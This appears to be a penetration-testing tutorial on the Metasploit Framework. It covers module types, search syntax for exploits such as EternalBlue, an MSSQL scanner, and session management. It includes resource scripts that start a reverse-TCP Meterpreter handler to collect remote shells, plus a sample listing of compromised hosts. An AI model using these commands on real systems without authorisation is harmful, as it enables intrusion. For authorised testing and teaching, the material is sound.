Metasploit is a multi-purpose computer security and penetration testing framework. Intentionally modular, it allows the attacker to mix and match scanners, exploits, and payloads into a single attack. Originally created by H.D. Moore for security analysis, it was later acquired by Rapid7, which added more intuitive, GUI-based commercial versions. Metasploit is considered to be the de facto exploit development framework. It is used worldwide for both legitimate security analysis and unauthorized activities.
Metasploit currently comes in three editions:
- Metasploit Framework—the free open source command-line version (installed by default in Kali Linux)
- Metasploit Express—a simplified commercial edition for security professionals who want to validate vulnerabilities
- Metasploit Pro—a full-featured graphical version that includes Quick Start wizards, easy vulnerability scanning and validation, phishing campaigns, and reporting
In addition to the Rapid7 projects, there are two popular GUI-based spin-offs:
- Armitage—a GUI for Metasploit framework created by Raphael Mudge
- Cobalt Strike—a commercial adversary simulation tool, also by Raphael Mudge, that started as a commercial extension of Armitage on top of Metasploit but now ships its own agent (Beacon), team server, and reporting
Metasploit's features are organized into modules. There are six basic types (recent releases add a seventh, evasion, for generating payloads that try to slip past endpoint defenses):
- Exploits—code that triggers a specific vulnerability in order to deliver a payload
- Payloads—code that runs on the target once the exploit succeeds (a command shell, Meterpreter, VNC, and so on)
- Post—additional tasks you can perform on a compromised host through an existing session (enumeration, credential dumping, persistence)
- Auxiliary—scanners, sniffers, fuzzers, spoofers, and other non-exploit features
- Encoders—transform a payload so that it avoids bytes the target will not accept (nulls, line feeds, and other "bad characters"); they are not a reliable way to evade antivirus
- Nops—generate no-operation padding to keep payload sizes consistent across exploit attempts and to build NOP sleds
Each type has many modules inside, grouped by sub-type or platform. When using Metasploit, you specify a particular module by its path. For example:
You launch Metasploit Framework by either selecting the MSF launcher on the Kali desktop toolbar or by entering msfconsole in a regular terminal window. Select a module with use followed by its path, then enter show options to see what it needs. Some options are required and some are optional; you set each one with set OPTION value. Examples include:
- RHOSTS—(remote) target names or addresses
- LHOST—attacker ("listener") address
- RPORT—target port
- LPORT—attacker listener port
- SMBUser—a user name for SMB-based attacks
- SMBPass—a password for SMB-based attacks
If you are using an exploit, you will also need to specify the payload (set PAYLOAD path). The payload is the code that runs on the target once it is compromised. The most popular payload is Meterpreter, an in-memory agent that runs inside the exploited process and gives you an interactive command prompt with its own commands for the file system, processes, privileges, credentials, and pivoting; type help at the meterpreter> prompt to list them.
Note: The quickest way to determine the correct module, payload, and options is usually a web search combined with the info command inside msfconsole, which prints a module's description, options, targets, and references. Be advised that Metasploit is frequently updated; examples and instructions found online are often outdated and no longer work.
Searching for and Using Metasploit Modules
Both Metasploit Framework and Metasploit Pro allow you to search for and select modules of any type, not just scanners. Armitage and Metasploit Pro both have a convenient GUI that many find easier to use. In msfconsole you can search by a number of criteria, including a simple string (which can appear anywhere in the name, date, rank, or description), CVE number (cve:), platform affected (platform:), application (client or server), and type (type:exploit, type:auxiliary, type:payload, and so on). You can also specify -o <filename> to save the output in CSV format. Searching is not case sensitive.
Find every exploit that refers to EternalBlue:
msf> search EternalBlue type:exploit
Find every exploit that applies to Windows XP SP3 and save to xpsp3_exploits.csv:
msf> search platform:"Windows XP SP3" type:exploit -o /root/xpsp3_exploits.csv
Find every VNC payload that applies to Windows:
msf> search Windows/VNC type:payload
Find every exploit that can be used against Microsoft SQL running on Windows:
msf> search Windows/MSSQL type:exploit
Find all Windows-based SMB exploits that have an excellent (most reliable) ranking. The rank: keyword filters on the rank column; the older -S switch instead applies a regular expression to the whole result row, so -S excellent gives the same result here:
msf> search Windows/SMB type:exploit rank:excellent
Search for every scanner that has to do with SMB:
msf> search scanner/smb
Search for every scanner that has to do with Microsoft SQL:
msf> search scanner/mssql
Scanner Usage Examples
Once you have found a module you would like to try, take its path from the search results, load it with use, and then show options to configure it. Enter run (or exploit, for exploit modules) to launch it. Remember that post modules can only be run against an existing Metasploit session (their SESSION option), after you have already exploited the target. The following example searches for MSSQL scanners, then configures and runs mssql_ping. This module queries the SQL Server Browser service on UDP 1434 across a host or range (it is listening on most MSSQL hosts) and, from the reply, reports the instance name, version, and the TCP port, default or not, that Microsoft SQL Server is using.
Here is an example search for MSSQL scanners.
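The same sequence (search, use, show options, set, run) written as an msfconsole resource script, so it can be reviewed before it is launched and replayed with msfconsole -r. This is an added example, not code from the original page or from Rapid7; the target range 192.0.2.0/24, THREADS value, and file names are assumptions.

```shell
#!/bin/sh
# Added example (not from the original page or from Rapid7): build an
# msfconsole resource (.rc) script that searches for MSSQL scanners, loads
# auxiliary/scanner/mssql/mssql_ping, sets its options and runs it.
# The target range, thread count and file name are assumptions.

# Write the resource script to the path in $1 for the target range in $2.
# Each line is exactly what you would type at the msf> prompt; 'exit' at the
# end makes the run non-interactive.
make_mssql_ping_rc() {
    rc_file="$1"
    targets="$2"
    cat > "$rc_file" <<EOF
search scanner/mssql
use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS $targets
set THREADS 10
run
exit
EOF
    echo "$rc_file"
}

# Count the 'set' lines in a resource script: a quick sanity check that the
# options you meant to configure are actually present before launching.
count_set_lines() {
    grep -c '^set ' "$1"
}

# Usage: write the script, review it, then hand it to msfconsole.
# -q suppresses the banner, -r replays the resource file line by line.
rc=$(make_mssql_ping_rc "${RC_FILE:-/tmp/mssql_ping.rc}" "${TARGETS:-192.0.2.0/24}")
echo "Resource script written to $rc ($(count_set_lines "$rc") options set):"
cat "$rc"
# Uncomment to launch (requires Metasploit Framework on this host):
# msfconsole -q -r "$rc"
```

Resource scripts are plain text, so they can be kept in version control alongside an engagement's notes, and the same file works for any scanner module by changing the use line and the set lines that follow it.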
Meterpreter Session Management
You can have several MSF/Meterpreter sessions running simultaneously. Here are some syntax examples for managing them:
Press Ctrl+Z (or type background) at the meterpreter> prompt to put your current session in the background and return to msf>.
List all of the sessions you currently have running:
msf> sessions -l
Switch to (interact with) session #2; sessions -i 2 is the long form of the same command:
msf> sessions 2
Here is an example of managing multiple Meterpreter sessions.
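Multiple sessions usually come from a listener that keeps running after the first connection. The resource script below starts exploit/multi/handler as a background job with ExitOnSession false and exploit -j -z, so new Meterpreter sessions are collected at msf> instead of dropping you into the first one; a small helper then pulls the session IDs out of a sessions -l listing, which is handy when scripting against many sessions. This is an added example, not code from the original page or from Rapid7; the LHOST/LPORT values and the sample listing are constructed, and the listing's column layout is an approximation of what msfconsole prints.

```shell
#!/bin/sh
# Added example (not from the original page or from Rapid7): a resource script
# that runs a multi/handler listener as a background job so incoming Meterpreter
# sessions accumulate without interrupting you, plus a helper that extracts
# session IDs from 'sessions -l' output. LHOST/LPORT and the sample listing
# below are assumptions.

# Write a handler resource script for the given listener address and port.
# ExitOnSession false keeps the handler alive after the first session;
# 'exploit -j' runs it as a job and '-z' does not auto-interact with sessions.
make_handler_rc() {
    rc_file="$1"; lhost="$2"; lport="$3"
    cat > "$rc_file" <<EOF
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
    echo "$rc_file"
}

# Print the numeric session IDs found in 'sessions -l' output read from stdin.
# Data rows begin with an integer Id column; the title, header, separator and
# blank lines do not, so they are skipped.
session_ids() {
    awk '$1 ~ /^[0-9]+$/ { print $1 }'
}

# Constructed sample of a 'sessions -l' listing (layout approximated).
SAMPLE_LISTING='Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ WIN1  10.0.0.5:4444 -> 10.0.0.21:49712 (10.0.0.21)
  2         shell linux                                          10.0.0.5:4444 -> 10.0.0.33:51102 (10.0.0.33)
  3         meterpreter x64/windows  CORP\jdoe @ WS02            10.0.0.5:4444 -> 10.0.0.40:50990 (10.0.0.40)'

# Return the IDs from the sample as one space-separated line ("1 2 3").
sample_session_ids() {
    printf '%s\n' "$SAMPLE_LISTING" | session_ids | tr '\n' ' ' | sed 's/ $//'
}

# Usage: write the handler script and show what the helper extracts.
rc=$(make_handler_rc "${RC_FILE:-/tmp/handler.rc}" "${LHOST:-10.0.0.5}" "${LPORT:-4444}")
echo "Handler script written to $rc"
echo "Session IDs in the sample listing: $(sample_session_ids)"
# Launch with:   msfconsole -q -r "$rc"
# Then at msf>:  sessions -l          list sessions
#                sessions -i 2        interact with session 2
#                background (or Ctrl+Z) at meterpreter>   return to msf>
#                sessions -k 2        kill session 2
#                jobs                 show the handler job; kill it with 'jobs -k <id>'
```

The session-ID helper is deliberately loose about column positions because the listing's layout changes between Metasploit versions; anchoring on "first field is an integer" survives those changes.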